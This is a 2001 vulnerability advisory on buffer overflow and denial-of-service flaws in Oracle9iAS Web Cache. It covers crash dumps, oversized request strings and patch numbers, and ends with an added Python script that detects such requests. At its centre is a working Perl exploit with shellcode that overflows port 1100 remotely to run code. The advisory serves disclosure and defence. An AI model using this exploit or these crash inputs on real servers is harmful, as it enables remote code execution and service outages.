Oracle9iAS Web Cache: multiple DoS and buffer overflow vulnerabilities

Published: 2001-10-19
Updated: 2001-10-19
Severity: Medium
Threat type: Remote denial of service
Bug class: Input validation error
Exploit vector: Server mode

Affected systems

Oracle9iAS Web Cache/2.0.0.1.0

Detailed description

Simple requests can cause a denial of service or a buffer overflow. Oracle9iAS Web Cache provides four web services, which by default run on the following ports:

Port 1100 = Incoming web cache proxy.
Port 4000 = Administrative interface.
Port 4001 = Web XML invalidation port.
Port 4002 = Statistics port.

1) Buffer overflow:

When a request contains / + 'A' x 3095 + 'N' x 4, the process crashes with the following state (EBP holds 0x41414141, the 'A' bytes, and EIP holds 0x4e4e4e4e, the four 'N' bytes):

<....snip>
State Dump for Thread Id 0x104
eax=00000c1d ebx=00000000 ecx=00000c1d edx=026f0041 esi=01baac86 edi=0040deb6
eip=4e4e4e4e esp=0632fe08 ebp=41414141 iopl=0
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000216
<snip....>

2) Denial of service

Sending a string of more than 3570 characters causes stack corruption:

'GET /<3571 x A> HTTP/1.0'

The following three methods drive CPU utilisation to 100%:

a: Send 3094 characters.
b: Send a request with a 4000-character HTTP header:

'GET / HTTP/1.0'
'User-Agent: <4000 x A>'

c: Send the following request (this affects the Web Cache admin interface):

Test code

#########################################################################
#
# Proof-of-concept exploit for Oracle9iAS Web Cache/2.0.0.1.0
# Creates the file c:\defcom.iyd
# By andreas@defcom.com (C)2001
#
#
# Since we do not control the space after what ESP points to, I was lazy
# and did a direct buffer jump. So, if it does not work, try changing
# the return address(start of buffer in mem) to one that fits your system.
# The buffer starts at 0x05c5f1e8 on my box(WIN2K prof SP2).
# /andreas
#
#########################################################################

$ARGC=@ARGV;
if ($ARGC !=1) {
  print "Usage: $0 <host>\n";
  print "Example: $0 127.0.0.1\n";
  exit;
}

use Socket;
my($remote,$port,$iaddr,$paddr,$proto);

$remote=$ARGV[0];
$port = "1100"; # default port for the web cache

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";

$sploit = "\xeb\x03\x5a\xeb\x05\xe8\xf8\xff\xff\xff\x8b\xec\x8b\xc2\x83\xc0\x18\x33\xc9";
$sploit=$sploit . "\x66\xb9\xb3\x80\x66\x81\xf1\x80\x80\x80\x30\x99\x40\xe2\xfa\xaa\x59";
$sploit=$sploit . "\xf1\x19\x99\x99\x99\xf3\x9b\xc9\xc9\xf1\x99\x99\x99\x89\x1a\x5b\xa4";
$sploit=$sploit . "\xcb\x27\x51\x99\xd5\x99\x66\x8f\xaa\x59\xc9\x27\x09\x98\xd5\x99\x66";
$sploit=$sploit . "\x8f\xfa\xa3\xc5\xfd\xfc\xff\xfa\xf6\xf4\xb7\xf0\xe0\xfd\x99";

$msg = "GET " . $sploit . "\x90" x (3096 - length($sploit)) . "\xe8\xf1\xc5\x05" . " HTTP/1.0\n\n";
print $msg;
send(SOCK, $msg, 0) or die "Cannot send query: $!";
sleep(1);
close(SOCK);
exit;

Solution

Download the patch from http://metalink.oracle.com

NT/WIN2K: Patch number 2044682
SUN Sparc Solaris: Patch number 2042106
HP-UX: Patch number 2043908
Linux: Patch number 2043924
Compaq Tru64 Unix: Patch number 2043921
IBM AIX: Patch number 2043917

Related information

George Hedfors <george.hedfors@defcom.com>
Andreas Junestam <andreas.junestam@defcom.com>

Reference: http://archives.neohapsis.com/archives/bugtraq/2001-10/0134.html
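As an added defender-side example (not part of the advisory or of Oracle's code), the following Python check applies the request-size thresholds from the denial-of-service section above to raw HTTP request heads, the kind of rule a reverse proxy or log-review script in front of Web Cache could use to alert on or drop such requests before they reach port 1100; the thresholds are the advisory's figures and the sample requests are constructed here for illustration.

```python
import re

# Thresholds taken from the advisory (request-target and header-value lengths).
PATH_CPU_DOS = 3094        # ~3094-char request target: CPU pegged at 100%
PATH_STACK_CORRUPT = 3571  # ~3571-char request target: stack corruption
HEADER_CPU_DOS = 4000      # 4000-char header value (User-Agent): CPU at 100%


def inspect_request(raw: bytes) -> list:
    """Return findings for one raw HTTP request head; an empty list means clean."""
    findings = []
    head = re.split(rb"\r?\n\r?\n", raw, maxsplit=1)[0]   # drop any body
    lines = re.split(rb"\r?\n", head)
    parts = lines[0].split(b" ")
    if len(parts) != 3:
        return ["malformed request line"]
    target = parts[1]
    n = len(target)
    if n >= PATH_STACK_CORRUPT:
        findings.append("request target %d chars (>= %d): stack corruption range"
                        % (n, PATH_STACK_CORRUPT))
    elif n >= PATH_CPU_DOS:
        findings.append("request target %d chars (>= %d): CPU exhaustion range"
                        % (n, PATH_CPU_DOS))
    # A URL path should be printable ASCII; raw binary in it points to a payload.
    if any(c < 0x20 or c > 0x7E for c in target):
        findings.append("request target contains non-printable bytes")
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if not sep:
            findings.append("malformed header line")
            continue
        vlen = len(value.strip())
        if vlen >= HEADER_CPU_DOS:
            findings.append("header %s value %d chars (>= %d): CPU exhaustion range"
                            % (name.decode("ascii", "replace"), vlen, HEADER_CPU_DOS))
    return findings


# Constructed sample requests mirroring the advisory's cases (not captured traffic).
SAMPLES = {
    "normal":     b"GET /index.html HTTP/1.0\r\nUser-Agent: Mozilla/4.0\r\n\r\n",
    "cpu_path":   b"GET /" + b"A" * 3094 + b" HTTP/1.0\r\n\r\n",
    "stack_path": b"GET /" + b"A" * 3571 + b" HTTP/1.0\r\n\r\n",
    "cpu_header": b"GET / HTTP/1.0\r\nUser-Agent: " + b"A" * 4000 + b"\r\n\r\n",
}


def scan_samples() -> dict:
    """Run the check over every sample; maps sample name to its findings."""
    return {name: inspect_request(req) for name, req in SAMPLES.items()}
```

Running `scan_samples()` flags the three oversized samples and returns no findings for the normal request.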